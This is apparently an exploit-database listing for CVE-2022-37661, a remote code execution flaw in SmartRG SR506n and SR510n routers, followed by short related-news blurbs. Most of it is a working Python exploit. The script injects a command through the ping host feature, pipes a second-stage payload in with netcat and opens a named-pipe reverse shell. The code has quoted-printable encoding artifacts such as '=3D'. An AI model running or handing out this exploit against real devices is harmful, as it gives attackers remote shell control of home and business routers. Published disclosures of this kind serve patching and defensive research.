Headline
SmartRG Router SR510n 2.6.13 Remote Code Execution
SmartRG Router SR510n version 2.6.13 suffers from a remote code execution vulnerability.
# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)# Date: 13/06/2022# Exploit Author: Yerodin Richards# Vendor Homepage: https://adtran.com# Version: 2.5.15 / 2.6.13 (confirmed)# Tested on: SR506n (2.5.15) & SR510n (2.6.13)# CVE : CVE-2022-37661import requestsfrom subprocess import Popen, PIPErouter_host =3D "http://192.168.1.1"authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"lhost =3D "lo"lport =3D 80payload_port =3D 81def main(): e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE) Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout) send_payload(f"|nc {lhost} {payload_port}|sh") print("done.. check shell")def get_session(): url =3D router_host + "/admin/ping.html" headers =3D {"Authorization": "Basic {}".format(authorization_header)} r =3D requests.get(url, headers=3Dheaders).text i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D") s =3D "" while r[i] !=3D "'": s =3D s + r[i] i =3D i + 1 return sdef send_payload(payload): print(payload) url =3D router_host + "/admin/pingHost.cmd" headers =3D {"Authorization": "Basic {}".format(authorization_header)} params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=: get_session()} requests.get(url, headers=3Dheaders, params=3Dparams).textmain()
Related news
CVE-2022-37661: SmartRG Router 2.6.13 Remote Code Execution ≈ Packet Storm
SmartRG SR506n 2.5.15 and SR510n 2.6.13 routers are vulnerable to Remote Code Execution (RCE) via the ping host feature.
SmartRG Router 2.6.13 Remote Code Execution
SmartRG Router version 2.6.13 suffers from a remote code execution vulnerability.